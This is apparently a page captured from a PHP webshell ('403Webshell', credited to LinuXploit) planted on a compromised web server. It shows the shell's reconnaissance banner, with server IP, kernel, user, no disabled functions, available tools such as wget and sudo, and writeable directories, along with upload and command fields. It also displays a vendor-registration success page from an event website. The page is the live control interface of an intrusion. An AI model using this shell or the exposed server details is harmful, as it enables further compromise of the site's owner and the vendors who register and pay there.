403Webshell
Server IP : 173.209.174.21  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux wcfs-server 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : nodor ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/thelittlebigshow/vendor-reg/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/thelittlebigshow/vendor-reg/success.php.b4 print
<?php
// Start the session to access the stored data
session_start();

// Check if session data exists, otherwise redirect back to registration page
if (!isset($_SESSION['name']) || !isset($_SESSION['email'])) {
    header("Location: index.php"); // Redirect to the registration page if no session data
    exit();
}

// Retrieve the session data
$name = $_SESSION['name'];
$email = $_SESSION['email'];
$phone = $_SESSION['phone'];
$address = $_SESSION['address'];
$city = $_SESSION['city'];
$state = $_SESSION['state'];
$zip = $_SESSION['zip'];
$website = $_SESSION['website'];
$description = $_SESSION['description'];
$category = $_SESSION['category'];
$spots = $_SESSION['spots'];
$amount = $_SESSION['amount'];
$transaction_id = $_SESSION['transaction_id'];

// Optional: Clear session data if you don't need it anymore
// session_unset(); // Uncomment this if you want to clear session data after use
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Registration Success</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #F5F5F5;
            color: #333333;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
        }
        .logo {
            display: block;
            max-width: 100%;
            max-height: 150px;
            margin-top: 20px;
            margin-bottom: 30px;
            object-fit: contain;
        }
        .main-container {
            background-color: #FFFFFF;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 600px;
        }
        h2 {
            color: #1E90FF;
            text-align: center;
        }
        p {
            text-align: center;
            font-size: 18px;
        }
        .btn {
            display: inline-block;
            background-color: #1E90FF;
            color: #fff;
            padding: 10px;
            margin-top: 20px;
            border-radius: 4px;
            font-size: 18px;
            cursor: pointer;
            text-decoration: none;
        }
        .btn:hover {
            background-color: #1C86EE;
        }
        .payment-section {
            display: flex;
            flex-direction: column;
            align-items: center;
            margin-top: 30px;
            width: 100%;
        }
        .payment-section h3 {
            font-size: 22px;
            font-weight: bold;
            margin-bottom: 20px;
        }
        .payment-buttons-container {
            display: flex;
            justify-content: center;
            gap: 20px; /* Adds space between the buttons */
        }
        .payment-button-container {
            overflow: auto;
            display: flex;
            flex-direction: column;
            justify-content: flex-end;
            align-items: center;
            width: 259px;
            background: #FFFFFF;
            border: 1px solid rgba(0, 0, 0, 0.1);
            box-shadow: -2px 10px 5px rgba(0, 0, 0, 0);
            border-radius: 10px;
            font-family: SQ Market, Helvetica, Arial, sans-serif;
        }
        .payment-button-container .content {
            padding: 20px;
        }
        .payment-button-container p {
            font-size: 18px;
            line-height: 20px;
        }
        .payment-button-container .price {
            font-size: 18px;
            line-height: 20px;
            font-weight: 600;
        }
        .payment-button-container a {
            display: inline-block;
            font-size: 18px;
            line-height: 48px;
            height: 48px;
            color: #ffffff;
            min-width: 212px;
            background-color: #006aff;
            text-align: center;
            box-shadow: 0 0 0 1px rgba(0,0,0,.1) inset;
            border-radius: 6px;
            text-decoration: none;
        }
        .payment-button-container a:hover {
            background-color: #0056cc;
        }
        .disclaimer {
            margin-top: 20px;
            font-size: 14px;
            color: #777777;
            text-align: center;
        }
        .links-container {
            margin-top: 20px;
            display: flex;
            justify-content: center;
            gap: 20px;
        }
    </style>
</head>
<body>
    <!-- Logo at the top -->
    <img src="https://www.thelittlebigshow.com/wp-content/uploads/2024/02/cropped-Logo.jpg" alt="Event Logo" class="logo">

    <div class="main-container">
        <h2>Registration Successful!</h2>
        <p>Thank you for registering! We look forward to having you as a vendor at The Little Big Show!</p>

        <p>If you have any questions, feel free to contact us at info@thelittlebigshow.com or  509-855-6396</p>
    </div>

    <!-- Payment Section -->
    <div class="payment-section">
        <h3>Pay now to secure spots. All spots not paid before the show are not guaranteed.</h3>

        <div class="payment-buttons-container">
            <!-- Food Vendor Button -->
            <div class="payment-button-container">
                <div class="content">
                    <p>Food Vendor</p>
                    <p class="price">$30.00</p>
                    <a target="_blank" href="https://square.link/u/9suAWD0n?src=embed">Buy now</a>
                </div>
            </div>

            <!-- Regular Vendor Button (per spot) -->
            <div class="payment-button-container">
                <div class="content">
                    <p>Vendor</p>
                    <p class="price">$20.00</p>
                    <a target="_blank" href="https://square.link/u/UVVjNjOo?src=embed">Buy now</a>
                </div>
            </div>
        </div>

        <!-- Disclaimer Text -->
        <div class="disclaimer">
            <p>All spots not paid before the show are not guaranteed.</p>
        </div>
    </div>

    <!-- Links Section -->
    <div class="links-container">
        <a href="index.php" class="btn">Back to Registration</a>
        <a href="https://www.thelittlebigshow.com" class="btn" target="_blank">The Little Big Show</a>
    </div>
</body>
</html>

<?php
// Optional: Clear session data after displaying the success page
// session_unset(); // Uncomment if needed
?>

Youez - 2016 - github.com/yon3zu
LinuXploit